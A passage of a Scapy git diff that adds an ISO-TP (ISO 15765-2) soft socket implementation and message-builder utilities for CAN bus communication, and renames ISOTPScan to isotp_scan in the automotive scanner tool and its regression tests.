packets with 0x00 which not + count to the payload. + Does not affect receiving packets. + :param extended_addr: Extended Address byte to be added at the + beginning of every CAN frame _sent_ by this object. Can be None + in order to disable extended addressing on sent frames. + :param extended_rx_addr: Extended Address byte expected to be found at + the beginning of every CAN frame _received_ by this object. Can + be None in order to disable extended addressing on received + frames. + :param rx_block_size: Block Size byte to be included in every Control + Flow Frame sent by this object. The default value of 0 means + that all the data will be received in a single block. + :param rx_separation_time_min: Time Minimum Separation byte to be + included in every Control Flow Frame sent by this object. The + default value of 0 indicates that the peer will not wait any + time between sending frames. + :param listen_only: Disables send of flow control frames + """ + + def __init__(self, + can_socket, # type: "CANSocket" + src_id, # type: int + dst_id, # type: int + padding=False, # type: bool + extended_addr=None, # type: Optional[int] + extended_rx_addr=None, # type: Optional[int] + rx_block_size=0, # type: int + rx_separation_time_min=0, # type: int + listen_only=False # type: bool + ): + # type: (...) -> None + self.can_socket = can_socket + self.dst_id = dst_id + self.src_id = src_id + self.padding = padding + self.fc_timeout = 1 + self.cf_timeout = 1 + + self.filter_warning_emitted = False + + self.extended_rx_addr = extended_rx_addr + self.ea_hdr = b"" + if extended_addr is not None: + self.ea_hdr = struct.pack("B", extended_addr) + self.listen_only = listen_only + + self.rxfc_bs = rx_block_size + self.rxfc_stmin = rx_separation_time_min + + self.rx_queue = queue.Queue() + self.rx_len = -1 + self.rx_buf = None # type: Optional[bytes] + self.rx_sn = 0 + self.rx_bs = 0 + self.rx_idx = 0 + self.rx_ts = 0.0 # type: Union[float, EDecimal] + self.rx_state = ISOTP_IDLE + + self.txfc_bs = 0 + self.txfc_stmin = 0 + self.tx_gap = 0 + + self.tx_buf = None # type: Optional[bytes] + self.tx_sn = 0 + self.tx_bs = 0 + self.tx_idx = 0 + self.rx_ll_dl = 0 + self.tx_state = ISOTP_IDLE + + self.tx_timeout_handle = None # type: Optional[TimeoutScheduler.Handle] # noqa: E501 + self.rx_timeout_handle = None # type: Optional[TimeoutScheduler.Handle] # noqa: E501 + self.rx_thread = CANReceiverThread(can_socket, self.on_can_recv) + + self.tx_mutex = Lock() + self.rx_mutex = Lock() + self.send_mutex = Lock() + + self.tx_done = Event() + self.tx_exception = None # type: Optional[str] + + self.tx_callbacks = [] # type: List[Callable[[], None]] + self.rx_callbacks = [] # type: List[Callable[[bytes], None]] + + self.rx_thread.start() + + def __del__(self): + # type: () -> None + self.close() + + def can_send(self, load): + # type: (bytes) -> None + if self.padding: + load += b"\xCC" * (CAN_MAX_DLEN - len(load)) + if self.src_id is None or self.src_id <= 0x7ff: + self.can_socket.send(CAN(identifier=self.src_id, data=load)) + else: + self.can_socket.send(CAN(identifier=self.src_id, flags="extended", + data=load)) + + def on_can_recv(self, p): + # type: (Packet) -> None + if not isinstance(p, CAN): + raise Scapy_Exception("argument is not a CAN frame") + if p.identifier != self.dst_id: + if not self.filter_warning_emitted and conf.verb >= 2: + warning("You should put a filter for identifier=%x on your " + "CAN socket", self.dst_id) + self.filter_warning_emitted = True + else: + self.on_recv(p) + + def close(self): + # type: () -> None + self.rx_thread.stop() + + def _rx_timer_handler(self): + # type: () -> None + """Method called every time the rx_timer times out, due to the peer not + sending a consecutive frame within the expected time window""" + + with self.rx_mutex: + if self.rx_state == ISOTP_WAIT_DATA: + # we did not get new data frames in time. + # reset rx state + self.rx_state = ISOTP_IDLE + if conf.verb > 2: + warning("RX state was reset due to timeout") + + def _tx_timer_handler(self): + # type: () -> None + """Method called every time the tx_timer times out, which can happen in + two situations: either a Flow Control frame was not received in time, + or the Separation Time Min is expired and a new frame must be sent.""" + + with self.tx_mutex: + if (self.tx_state == ISOTP_WAIT_FC or + self.tx_state == ISOTP_WAIT_FIRST_FC): + # we did not get any flow control frame in time + # reset tx state + self.tx_state = ISOTP_IDLE + self.tx_exception = "TX state was reset due to timeout" + self.tx_done.set() + raise Scapy_Exception(self.tx_exception) + elif self.tx_state == ISOTP_SENDING: + # push out the next segmented pdu + src_off = len(self.ea_hdr) + max_bytes = 7 - src_off + if self.tx_buf is None: + self.tx_exception = "TX buffer is not filled" + raise Scapy_Exception(self.tx_exception) + + while 1: + load = self.ea_hdr + load += struct.pack("B", N_PCI_CF + self.tx_sn) + load += self.tx_buf[self.tx_idx:self.tx_idx + max_bytes] + self.can_send(load) + + self.tx_sn = (self.tx_sn + 1) % 16 + self.tx_bs += 1 + self.tx_idx += max_bytes + + if len(self.tx_buf) <= self.tx_idx: + # we are done + self.tx_state = ISOTP_IDLE + self.tx_done.set() + for cb in self.tx_callbacks: + cb() + return + + if self.txfc_bs != 0 and self.tx_bs >= self.txfc_bs: + # stop and wait for FC + self.tx_state = ISOTP_WAIT_FC + self.tx_timeout_handle = TimeoutScheduler.schedule( + self.fc_timeout, self._tx_timer_handler) + return + + if self.tx_gap == 0: + continue + else: + # stop and wait for tx gap + self.tx_timeout_handle = TimeoutScheduler.schedule( + self.tx_gap, self._tx_timer_handler) + return + + def on_recv(self, cf): + # type: (Packet) -> None + """Function that must be called every time a CAN frame is received, to + advance the state machine.""" + + data = bytes(cf.data) + + if len(data) < 2: + return + + ae = 0 + if self.extended_rx_addr is not None: + ae = 1 + if len(data) < 3: + return + if six.indexbytes(data, 0) != self.extended_rx_addr: + return + + n_pci = six.indexbytes(data, ae) & 0xf0 + + if n_pci == N_PCI_FC: + with self.tx_mutex: + self._recv_fc(data[ae:]) + elif n_pci == N_PCI_SF: + with self.rx_mutex: + self._recv_sf(data[ae:], cf.time) + elif n_pci == N_PCI_FF: + with self.rx_mutex: + self._recv_ff(data[ae:], cf.time) + elif n_pci == N_PCI_CF: + with self.rx_mutex: + self._recv_cf(data[ae:]) + + def _recv_fc(self, data): + # type: (bytes) -> None + """Process a received 'Flow Control' frame""" + if (self.tx_state != ISOTP_WAIT_FC and + self.tx_state != ISOTP_WAIT_FIRST_FC): + return + + if self.tx_timeout_handle is not None: + self.tx_timeout_handle.cancel() + self.tx_timeout_handle = None + + if len(data) < 3: + self.tx_state = ISOTP_IDLE + self.tx_exception = "CF frame discarded because it was too short" + self.tx_done.set() + raise Scapy_Exception(self.tx_exception) + + # get communication parameters only from the first FC frame + if self.tx_state == ISOTP_WAIT_FIRST_FC: + self.txfc_bs = six.indexbytes(data, 1) + self.txfc_stmin = six.indexbytes(data, 2) + + if ((self.txfc_stmin > 0x7F) and + ((self.txfc_stmin < 0xF1) or (self.txfc_stmin > 0xF9))): + self.txfc_stmin = 0x7F + + if six.indexbytes(data, 2) <= 127: + tx_gap = six.indexbytes(data, 2) / 1000.0 + elif 0xf1 <= six.indexbytes(data, 2) <= 0xf9: + tx_gap = (six.indexbytes(data, 2) & 0x0f) / 10000.0 + else: + tx_gap = 0 + self.tx_gap = tx_gap + + self.tx_state = ISOTP_WAIT_FC + + isotp_fc = six.indexbytes(data, 0) & 0x0f + + if isotp_fc == ISOTP_FC_CTS: + self.tx_bs = 0 + self.tx_state = ISOTP_SENDING + # start cyclic timer for sending CF frame + self.tx_timeout_handle = TimeoutScheduler.schedule( + self.tx_gap, self._tx_timer_handler) + elif isotp_fc == ISOTP_FC_WT: + # start timer to wait for next FC frame + self.tx_state = ISOTP_WAIT_FC + self.tx_timeout_handle = TimeoutScheduler.schedule( + self.fc_timeout, self._tx_timer_handler) + elif isotp_fc == ISOTP_FC_OVFLW: + # overflow in receiver side + self.tx_state = ISOTP_IDLE + self.tx_exception = "Overflow happened at the receiver side" + self.tx_done.set() + raise Scapy_Exception(self.tx_exception) + else: + self.tx_state = ISOTP_IDLE + self.tx_exception = "Unknown FC frame type" + self.tx_done.set() + raise Scapy_Exception(self.tx_exception) + + def _recv_sf(self, data, ts): + # type: (bytes, Union[float, EDecimal]) -> None + """Process a received 'Single Frame' frame""" + if self.rx_timeout_handle is not None: + self.rx_timeout_handle.cancel() + self.rx_timeout_handle = None + + if self.rx_state != ISOTP_IDLE: + if conf.verb > 2: + warning("RX state was reset because single frame was received") + self.rx_state = ISOTP_IDLE + + length = six.indexbytes(data, 0) & 0xf + if len(data) - 1 < length: + return + + msg = data[1:1 + length] + self.rx_queue.put((msg, ts)) + for cb in self.rx_callbacks: + cb(msg) + + def _recv_ff(self, data, ts): + # type: (bytes, Union[float, EDecimal]) -> None + """Process a received 'First Frame' frame""" + if self.rx_timeout_handle is not None: + self.rx_timeout_handle.cancel() + self.rx_timeout_handle = None + + if self.rx_state != ISOTP_IDLE: + if conf.verb > 2: + warning("RX state was reset because first frame was received") + self.rx_state = ISOTP_IDLE + + if len(data) < 7: + return + self.rx_ll_dl = len(data) + + # get the FF_DL + self.rx_len = (six.indexbytes(data, 0) & 0x0f) * 256 + six.indexbytes( + data, 1) + ff_pci_sz = 2 + + # Check for FF_DL escape sequence supporting 32 bit PDU length + if self.rx_len == 0: + # FF_DL = 0 => get real length from next 4 bytes + self.rx_len = six.indexbytes(data, 2) << 24 + self.rx_len += six.indexbytes(data, 3) << 16 + self.rx_len += six.indexbytes(data, 4) << 8 + self.rx_len += six.indexbytes(data, 5) + ff_pci_sz = 6 + + # copy the first received data bytes + data_bytes = data[ff_pci_sz:] + self.rx_idx = len(data_bytes) + self.rx_buf = data_bytes + self.rx_ts = ts + + # initial setup for this pdu reception + self.rx_sn = 1 + self.rx_state = ISOTP_WAIT_DATA + + # no creation of flow control frames + if not self.listen_only: + # send our first FC frame + load = self.ea_hdr + load += struct.pack("BBB", N_PCI_FC, self.rxfc_bs, self.rxfc_stmin) + self.can_send(load) + + # wait for a CF + self.rx_bs = 0 + self.rx_timeout_handle = TimeoutScheduler.schedule( + self.cf_timeout, self._rx_timer_handler) + + def _recv_cf(self, data): + # type: (bytes) -> None + """Process a received 'Consecutive Frame' frame""" + if self.rx_state != ISOTP_WAIT_DATA: + return + + if self.rx_timeout_handle is not None: + self.rx_timeout_handle.cancel() + self.rx_timeout_handle = None + + # CFs are never longer than the FF + if len(data) > self.rx_ll_dl: + return + + # CFs have usually the LL_DL length + if len(data) < self.rx_ll_dl: + # this is only allowed for the last CF + if self.rx_len - self.rx_idx > self.rx_ll_dl: + if conf.verb > 2: + warning("Received a CF with insufficient length") + return + + if six.indexbytes(data, 0) & 0x0f != self.rx_sn: + # Wrong sequence number + if conf.verb > 2: + warning("RX state was reset because wrong sequence number was " + "received") + self.rx_state = ISOTP_IDLE + return + + if self.rx_buf is None: + raise Scapy_Exception("rx_buf not filled with data!") + + self.rx_sn = (self.rx_sn + 1) % 16 + self.rx_buf += data[1:] + self.rx_idx = len(self.rx_buf) + + if self.rx_idx >= self.rx_len: + # we are done + self.rx_buf = self.rx_buf[0:self.rx_len] + self.rx_state = ISOTP_IDLE + self.rx_queue.put((self.rx_buf, self.rx_ts)) + for cb in self.rx_callbacks: + cb(self.rx_buf) + self.rx_buf = None + return + + # perform blocksize handling, if enabled + if self.rxfc_bs != 0: + self.rx_bs += 1 + + # check if we reached the end of the block + if self.rx_bs >= self.rxfc_bs and not self.listen_only: + # send our FC frame + load = self.ea_hdr + load += struct.pack("BBB", N_PCI_FC, self.rxfc_bs, + self.rxfc_stmin) + self.can_send(load) + + # wait for another CF + self.rx_timeout_handle = TimeoutScheduler.schedule( + self.cf_timeout, self._rx_timer_handler) + + def begin_send(self, x): + # type: (bytes) -> None + """Begins sending an ISOTP message. This method does not block.""" + with self.tx_mutex: + if self.tx_state != ISOTP_IDLE: + raise Scapy_Exception("Socket is already sending, retry later") + + self.tx_done.clear() + self.tx_exception = None + self.tx_state = ISOTP_SENDING + + length = len(x) + if length > ISOTP_MAX_DLEN_2015: + raise Scapy_Exception("Too much data for ISOTP message") + + if len(self.ea_hdr) + length <= 7: + # send a single frame + data = self.ea_hdr + data += struct.pack("B", length) + data += x + self.tx_state = ISOTP_IDLE + self.can_send(data) + self.tx_done.set() + for cb in self.tx_callbacks: + cb() + return + + # send the first frame + data = self.ea_hdr + if length > ISOTP_MAX_DLEN: + data += struct.pack(">HI", 0x1000, length) + else: + data += struct.pack(">H", 0x1000 | length) + load = x[0:8 - len(data)] + data += load + self.can_send(data) + + self.tx_buf = x + self.tx_sn = 1 + self.tx_bs = 0 + self.tx_idx = len(load) + + self.tx_state = ISOTP_WAIT_FIRST_FC + self.tx_timeout_handle = TimeoutScheduler.schedule( + self.fc_timeout, self._tx_timer_handler) + + def send(self, p): + # type: (bytes) -> None + """Send an ISOTP frame and block until the message is sent or an error + happens.""" + with self.send_mutex: + self.begin_send(p) + + # Wait until the tx callback is called + send_done = self.tx_done.wait(30) + if self.tx_exception is not None: + raise Scapy_Exception(self.tx_exception) + if not send_done: + raise Scapy_Exception("ISOTP send not completed in 30s") + return + + def recv(self, timeout=None): + # type: (Optional[int]) -> Optional[Tuple[bytes, Union[float, EDecimal]]] # noqa: E501 + """Receive an ISOTP frame, blocking if none is available in the buffer + for at most 'timeout' seconds.""" + + try: + return self.rx_queue.get(timeout is None or timeout > 0, timeout) + except queue.Empty: + return None diff --git a/scapy/contrib/isotp/isotp_utils.py b/scapy/contrib/isotp/isotp_utils.py new file mode 100644 index 00000000000..ea2cced9a42 --- /dev/null +++ b/scapy/contrib/isotp/isotp_utils.py @@ -0,0 +1,342 @@ +# This file is part of Scapy +# See http://www.secdev.org/projects/scapy for more information +# Copyright (C) Nils Weiss +# Copyright (C) Enrico Pozzobon +# Copyright (C) Alexander Schroeder +# This program is published under a GPLv2 license + +# scapy.contrib.description = ISO-TP (ISO 15765-2) Utilities +# scapy.contrib.status = library + +import struct + +from scapy.compat import Iterable, Optional, Union, List, Tuple, Dict, Any, \ + Type +from scapy.utils import EDecimal +from scapy.packet import Packet +from scapy.sessions import DefaultSession +from scapy.contrib.isotp.isotp_packet import ISOTP, N_PCI_CF, N_PCI_SF, \ + N_PCI_FF, N_PCI_FC +import scapy.modules.six as six + + +class ISOTPMessageBuilderIter(object): + """ + Iterator class for ISOTPMessageBuilder + """ + slots = ["builder"] + + def __init__(self, builder): + # type: (ISOTPMessageBuilder) -> None + self.builder = builder + + def __iter__(self): + # type: () -> ISOTPMessageBuilderIter + return self + + def __next__(self): + # type: () -> ISOTP + while self.builder.count: + p = self.builder.pop() + if p is None: + break + else: + return p + raise StopIteration + + next = __next__ + + +class ISOTPMessageBuilder(object): + """ + Initialize a ISOTPMessageBuilder object + + Utility class to build ISOTP messages out of CAN frames, used by both + ISOTP.defragment() and ISOTPSession. + + This class attempts to interpret some CAN frames as ISOTP frames, both with + and without extended addressing at the same time. For example, if an + extended address of 07 is being used, all frames will also be interpreted + as ISOTP single-frame messages. + + CAN frames are fed to an ISOTPMessageBuilder object with the feed() method + and the resulting ISOTP frames can be extracted using the pop() method. + + :param use_ext_addr: True for only attempting to defragment with + extended addressing, False for only attempting + to defragment without extended addressing, + or None for both + :param did: Destination Identifier + :param basecls: The class of packets that will be returned, + defaults to ISOTP + """ + + class Bucket(object): + """ + Helper class to store not finished ISOTP messages while building. + """ + + def __init__(self, total_len, first_piece, ts): + # type: (int, bytes, Union[EDecimal, float]) -> None + self.pieces = list() # type: List[bytes] + self.total_len = total_len + self.current_len = 0 + self.ready = None # type: Optional[bytes] + self.src = None # type: Optional[int] + self.exsrc = None # type: Optional[int] + self.time = ts # type: Union[float, EDecimal] + self.push(first_piece) + + def push(self, piece): + # type: (bytes) -> None + self.pieces.append(piece) + self.current_len += len(piece) + if self.current_len >= self.total_len: + if six.PY3: + isotp_data = b"".join(self.pieces) + else: + isotp_data = "".join(map(str, self.pieces)) + self.ready = isotp_data[:self.total_len] + + def __init__( + self, + use_ext_addr=None, # type: Optional[bool] + did=None, # type: Optional[Union[int, List[int], Iterable[int]]] + basecls=ISOTP # type: Type[Packet] + ): + # type: (...) -> None + self.ready = [] # type: List[Tuple[int, Optional[int], ISOTPMessageBuilder.Bucket]] # noqa: E501 + self.buckets = {} # type: Dict[Tuple[Optional[int], int, int], ISOTPMessageBuilder.Bucket] # noqa: E501 + self.use_ext_addr = use_ext_addr + self.basecls = basecls + self.dst_ids = None # type: Optional[Iterable[int]] + self.last_ff = None # type: Optional[Tuple[Optional[int], int, int]] + self.last_ff_ex = None # type: Optional[Tuple[Optional[int], int, int]] # noqa: E501 + if did is not None: + if isinstance(did, list): + self.dst_ids = did + elif isinstance(did, int): + self.dst_ids = [did] + elif hasattr(did, "__iter__"): + self.dst_ids = did + else: + raise TypeError("Invalid type for argument did!") + + def feed(self, can): + # type: (Union[Iterable[Packet], Packet]) -> None + """Attempt to feed an incoming CAN frame into the state machine""" + if not isinstance(can, Packet) and hasattr(can, "__iter__"): + for p in can: + self.feed(p) + return + + if not isinstance(can, Packet): + return + + if self.dst_ids is not None and can.identifier not in self.dst_ids: + return + + data = bytes(can.data) + + if len(data) > 1 and self.use_ext_addr is not True: + self._try_feed(can.identifier, None, data, can.time) + if len(data) > 2 and self.use_ext_addr is not False: + ea = six.indexbytes(data, 0) + self._try_feed(can.identifier, ea, data[1:], can.time) + + @property + def count(self): + # type: () -> int + """Returns the number of ready ISOTP messages built from the provided + can frames + + :return: Number of ready ISOTP messages + """ + return len(self.ready) + + def __len__(self): + # type: () -> int + return self.count + + def pop(self, identifier=None, ext_addr=None): + # type: (Optional[int], Optional[int]) -> Optional[Packet] + """Returns a built ISOTP message + + :param identifier: if not None, only return isotp messages with this + destination + :param ext_addr: if identifier is not None, only return isotp messages + with this extended address for destination + :returns: an ISOTP packet, or None if no message is ready + """ + + if identifier is not None: + for i in range(len(self.ready)): + b = self.ready[i] + iden = b[0] + ea = b[1] + if iden == identifier and ext_addr == ea: + return ISOTPMessageBuilder._build(self.ready.pop(i), + self.basecls) + return None + + if len(self.ready) > 0: + return ISOTPMessageBuilder._build(self.ready.pop(0), self.basecls) + return None + + def __iter__(self): + # type: () -> ISOTPMessageBuilderIter + return ISOTPMessageBuilderIter(self) + + @staticmethod + def _build( + t, # type: Tuple[int, Optional[int], ISOTPMessageBuilder.Bucket] + basecls=ISOTP # type: Type[Packet] + ): + # type: (...) -> Packet + bucket = t[2] + data = bucket.ready or b"" + p = basecls(data) + if hasattr(p, "dst"): + p.dst = t[0] + if hasattr(p, "exdst"): + p.exdst = t[1] + if hasattr(p, "src"): + p.src = bucket.src + if hasattr(p, "exsrc"): + p.exsrc = bucket.exsrc + if hasattr(p, "time"): + p.time = bucket.time + return p + + def _feed_first_frame(self, identifier, ea, data, ts): + # type: (int, Optional[int], bytes, Union[EDecimal, float]) -> bool + if len(data) < 3: + # At least 3 bytes are necessary: 2 for length and 1 for data + return False + + header = struct.unpack('>H', bytes(data[:2]))[0] + expected_length = header & 0x0fff + isotp_data = data[2:] + if expected_length == 0 and len(data) >= 6: + expected_length = struct.unpack('>I', bytes(data[2:6]))[0] + isotp_data = data[6:] + + key = (ea, identifier, 1) + if ea is None: + self.last_ff = key + else: + self.last_ff_ex = key + self.buckets[key] = self.Bucket(expected_length, isotp_data, ts) + return True + + def _feed_single_frame(self, identifier, ea, data, ts): + # type: (int, Optional[int], bytes, Union[EDecimal, float]) -> bool + if len(data) < 2: + # At least 2 bytes are necessary: 1 for length and 1 for data + return False + + length = six.indexbytes(data, 0) & 0x0f + isotp_data = data[1:length + 1] + + if length > len(isotp_data): + # CAN frame has less data than expected + return False + + self.ready.append((identifier, ea, + self.Bucket(length, isotp_data, ts))) + return True + + def _feed_consecutive_frame(self, identifier, ea, data): + # type: (int, Optional[int], bytes) -> bool + if len(data) < 2: + # At least 2 bytes are necessary: 1 for sequence number and + # 1 for data + return False + + first_byte = six.indexbytes(data, 0) + seq_no = first_byte & 0x0f + isotp_data = data[1:] + + key = (ea, identifier, seq_no) + bucket = self.buckets.pop(key, None) + + if bucket is None: + # There is no message constructor waiting for this frame + return False + + bucket.push(isotp_data) + if bucket.ready is None: + # full ISOTP message is not ready yet, put it back in + # buckets list + next_seq = (seq_no + 1) % 16 + key = (ea, identifier, next_seq) + self.buckets[key] = bucket + else: + self.ready.append((identifier, ea, bucket)) + + return True + + def _feed_flow_control_frame(self, identifier, ea, data): + # type: (int, Optional[int], bytes) -> bool + if len(data) < 3: + # At least 2 bytes are necessary: 1 for sequence number and + # 1 for data + return False + + keys = [x for x in (self.last_ff, self.last_ff_ex) if x is not None] + buckets = [self.buckets.pop(k, None) for k in keys] + + self.last_ff = None + self.last_ff_ex = None + + if not any(buckets) or not any(keys): + # There is no message constructor waiting for this frame + return False + + for key, bucket in zip(keys, buckets): + if bucket is None: + continue + bucket.src = identifier + bucket.exsrc = ea + self.buckets[key] = bucket + return True + + def _try_feed(self, identifier, ea, data, ts): + # type: (int, Optional[int], bytes, Union[EDecimal, float]) -> None + first_byte = six.indexbytes(data, 0) + if len(data) > 1 and first_byte & 0xf0 == N_PCI_SF: + self._feed_single_frame(identifier, ea, data, ts) + if len(data) > 2 and first_byte & 0xf0 == N_PCI_FF: + self._feed_first_frame(identifier, ea, data, ts) + if len(data) > 1 and first_byte & 0xf0 == N_PCI_CF: + self._feed_consecutive_frame(identifier, ea, data) + if len(data) > 1 and first_byte & 0xf0 == N_PCI_FC: + self._feed_flow_control_frame(identifier, ea, data) + + +class ISOTPSession(DefaultSession): + """Defragment ISOTP packets 'on-the-flow'. + + Usage: + >>> sniff(session=ISOTPSession) + """ + + def __init__(self, *args, **kwargs): + # type: (Any, Any) -> None + super(ISOTPSession, self).__init__(*args, **kwargs) + self.m = ISOTPMessageBuilder( + use_ext_addr=kwargs.pop("use_ext_addr", None), + did=kwargs.pop("did", None), + basecls=kwargs.pop("basecls", ISOTP)) + + def on_packet_received(self, pkt): + # type: (Optional[Packet]) -> None + if not pkt: + return + self.m.feed(pkt) + while len(self.m) > 0: + rcvd = self.m.pop() + if self._supersession: + self._supersession.on_packet_received(rcvd) + else: + super(ISOTPSession, self).on_packet_received(rcvd) diff --git a/scapy/tools/automotive/isotpscanner.py b/scapy/tools/automotive/isotpscanner.py index 7160e05bdfb..27232ef9562 100755 --- a/scapy/tools/automotive/isotpscanner.py +++ b/scapy/tools/automotive/isotpscanner.py @@ -21,7 +21,7 @@ conf.contribs['CANSocket'] = {'use-python-can': True} from scapy.contrib.cansocket import CANSocket, PYTHON_CAN # noqa: E402 -from scapy.contrib.isotp import ISOTPScan # noqa: E402 +from scapy.contrib.isotp import isotp_scan # noqa: E402 def signal_handler(sig, frame): @@ -175,15 +175,15 @@ def main(): signal.signal(signal.SIGINT, signal_handler) - result = ISOTPScan(sock, - range(start, end + 1), - extended_addressing=extended, - noise_listen_time=noise_listen_time, - sniff_time=float(sniff_time) / 1000, - output_format="code" if piso else "text", - can_interface=interface_string, - extended_can_id=extended_can_id, - verbose=verbose) + result = isotp_scan(sock, + range(start, end + 1), + extended_addressing=extended, + noise_listen_time=noise_listen_time, + sniff_time=float(sniff_time) / 1000, + output_format="code" if piso else "text", + can_interface=interface_string, + extended_can_id=extended_can_id, + verbose=verbose) print("Scan: \n%s" % result) diff --git a/test/contrib/automotive/interface_mockup.py b/test/contrib/automotive/interface_mockup.py index 6e851e95de0..09ebcdaeafe 100644 --- a/test/contrib/automotive/interface_mockup.py +++ b/test/contrib/automotive/interface_mockup.py @@ -110,7 +110,7 @@ def cleanup_interfaces(): :return: True on success """ import threading - from scapy.contrib.isotp import CANReceiverThread + from scapy.contrib.isotp.isotp_soft_socket import CANReceiverThread for t in threading.enumerate(): if isinstance(t, CANReceiverThread): t.join(10) diff --git a/test/contrib/isotp.uts b/test/contrib/isotp.uts index 3a307e8c7b4..a0d95a03491 100644 --- a/test/contrib/isotp.uts +++ b/test/contrib/isotp.uts @@ -1,7 +1,5 @@ % Regression tests for ISOTP -~ vcan_socket - + Configuration ~ conf @@ -9,7 +7,7 @@ from scapy.modules.six.moves.queue import Queue from io import BytesIO -from scapy.contrib.isotp import get_isotp_packet +from scapy.contrib.isotp.isotp_scanner import get_isotp_packet import scapy.modules.six as six diff --git a/test/contrib/isotpscan.uts b/test/contrib/isotpscan.uts index f4bbcc5bf58..2a8eaf9ee85 100644 --- a/test/contrib/isotpscan.uts +++ b/test/contrib/isotpscan.uts @@ -1,4 +1,4 @@ -% Regression tests for ISOTPScan +% Regression tests for isotp_scan * Some tests are disabled to lower the CI utilitzation + Configuration @@ -6,7 +6,7 @@ = Imports import scapy.modules.six as six -from scapy.contrib.isotp import send_multiple_ext, filter_periodic_packets, scan_extended, scan +from scapy.contrib.isotp.isotp_scanner import send_multiple_ext, filter_periodic_packets, scan_extended, scan if six.PY3: exec(open("test/contrib/automotive/interface_mockup.py").read()) @@ -169,11 +169,11 @@ def test_isotpscan_text(sniff_time=0.02): semaphore.acquire() semaphore.acquire() with new_can_socket0() as scansock: - result = ISOTPScan(scansock, range(0x5ff, 0x604 + 1), - output_format="text", - noise_listen_time=sniff_time * 6, - sniff_time=sniff_time, - verbose=True) + result = isotp_scan(scansock, range(0x5ff, 0x604 + 1), + output_format="text", + noise_listen_time=sniff_time * 6, + sniff_time=sniff_time, + verbose=True) with new_can_socket0() as cans: cans.send(CAN(identifier=0x601, data=b'\x01\xaa')) cans.send(CAN(identifier=0x602, data=b'\x01\xaa')) @@ -207,11 +207,11 @@ def test_isotpscan_text_padding(sniff_time=0.02): semaphore.acquire() semaphore.acquire() with new_can_socket0() as scansock: - result = ISOTPScan(scansock, range(0x5ff, 0x604 + 1), - output_format="text", - noise_listen_time=sniff_time * 6, - sniff_time=sniff_time, - verbose=True) + result = isotp_scan(scansock, range(0x5ff, 0x604 + 1), + output_format="text", + noise_listen_time=sniff_time * 6, + sniff_time=sniff_time, + verbose=True) with new_can_socket0() as cans: cans.send(CAN(identifier=0x601, data=b'\x01\xaaffffff')) cans.send(CAN(identifier=0x602, data=b'\x01\xaaffffff')) @@ -248,12 +248,12 @@ def test_isotpscan_text_extended_can_id(sniff_time=0.02): semaphore.acquire() semaphore.acquire() with new_can_socket0() as scansock: - result = ISOTPScan(scansock, range(0x1ffff5ff, 0x1ffff604 + 1), - output_format="text", - noise_listen_time=sniff_time * 6, - sniff_time=sniff_time, - extended_can_id=True, - verbose=True) + result = isotp_scan(scansock, range(0x1ffff5ff, 0x1ffff604 + 1), + output_format="text", + noise_listen_time=sniff_time * 6, + sniff_time=sniff_time, + extended_can_id=True, + verbose=True) with new_can_socket0() as cans: cans.send(CAN(identifier=0x1ffff601, flags="extended", data=b'\x01\xaa')) @@ -292,12 +292,12 @@ def test_isotpscan_code(sniff_time=0.02): semaphore.acquire() semaphore.acquire() with new_can_socket0() as scansock: - result = ISOTPScan(scansock, range(0x5ff, 0x603 + 1), - output_format="code", - noise_listen_time=sniff_time * 6, - sniff_time=sniff_time, - can_interface="can0", - verbose=True) + result = isotp_scan(scansock, range(0x5ff, 0x603 + 1), + output_format="code", + noise_listen_time=sniff_time * 6, + sniff_time=sniff_time, + can_interface="can0", + verbose=True) with new_can_socket0() as cans: cans.send(CAN(identifier=0x601, data=b'\x01\xaa')) cans.send(CAN(identifier=0x602, data=b'\x01\xaa')) @@ -332,12 +332,12 @@ def test_isotpscan_code_noise(sniff_time=0.02): semaphore.acquire() semaphore.acquire() with new_can_socket0() as scansock: - result = ISOTPScan(scansock, range(0x5ff, 0x603 + 1), - output_format="code", - noise_listen_time=sniff_time * 6, - sniff_time=sniff_time, - can_interface="can0", - verbose=True) + result = isotp_scan(scansock, range(0x5ff, 0x603 + 1), + output_format="code", + noise_listen_time=sniff_time * 6, + sniff_time=sniff_time, + can_interface="can0", + verbose=True) with new_can_socket0() as cans: cans.send(CAN(identifier=0x601, data=b'\x01\xaa')) cans.send(CAN(identifier=0x603, data=b'\x01\xaa')) @@ -370,12 +370,12 @@ def test_extended_isotpscan_code(sniff_time=0.02): semaphore.acquire() thread_noise.start() with new_can_socket0() as scansock: - result = ISOTPScan(scansock, range(0x5ff, 0x603 + 1), - extended_scan_range=range(0x20, 0x30), - extended_addressing=True, sniff_time=sniff_time, - noise_listen_time=sniff_time * 6, - output_format="code", - can_interface="can0", verbose=True) + result = isotp_scan(scansock, range(0x5ff, 0x603 + 1), + extended_scan_range=range(0x20, 0x30), + extended_addressing=True, sniff_time=sniff_time, + noise_listen_time=sniff_time * 6, + output_format="code", + can_interface="can0", verbose=True) with new_can_socket0() as cans: cans.send(CAN(identifier=0x602, data=b'\x22\x01\xaa')) cans.send(CAN(identifier=0x603, data=b'\x22\x01\xaa')) @@ -413,15 +413,15 @@ def test_extended_isotpscan_code_extended_can_id(sniff_time=0.02): semaphore.acquire() thread_noise.start() with new_can_socket0() as scansock: - result = ISOTPScan(scansock, range(0x1ffff5ff, 0x1ffff604 + 1), - extended_can_id=True, - extended_scan_range=range(0x20, 0x30), - extended_addressing=True, - sniff_time=sniff_time, - noise_listen_time=sniff_time * 6, - output_format="code", - can_interface="can0", - verbose=True) + result = isotp_scan(scansock, range(0x1ffff5ff, 0x1ffff604 + 1), + extended_can_id=True, + extended_scan_range=range(0x20, 0x30), + extended_addressing=True, + sniff_time=sniff_time, + noise_listen_time=sniff_time * 6, + output_format="code", + can_interface="can0", + verbose=True) with new_can_socket0() as cans: cans.send(CAN(identifier=0x1ffff602, flags="extended", data=b'\x22\x01\xaa')) @@ -458,11 +458,11 @@ def test_isotpscan_none(sniff_time=0.02): with new_can_socket0() as socks_interface: thread_noise.start() with new_can_socket0() as scansock: - result = ISOTPScan(scansock, range(0x5ff, 0x603 + 1), - can_interface=socks_interface, - sniff_time=sniff_time, - noise_listen_time=sniff_time * 6, - verbose=True) + result = isotp_scan(scansock, range(0x5ff, 0x603 + 1), + can_interface=socks_interface, + sniff_time=sniff_time, + noise_listen_time=sniff_time * 6, + verbose=True) result = sorted(result, key=lambda x: x.src) with new_can_socket0() as cans: cans.send(CAN(identifier=0x601, data=b'\x01\xaa')) @@ -507,11 +507,11 @@ def test_isotpscan_none_2(sniff_time=0.02): thread_noise.start() with new_can_socket0() as socks_interface: with new_can_socket0() as scansock: - result = 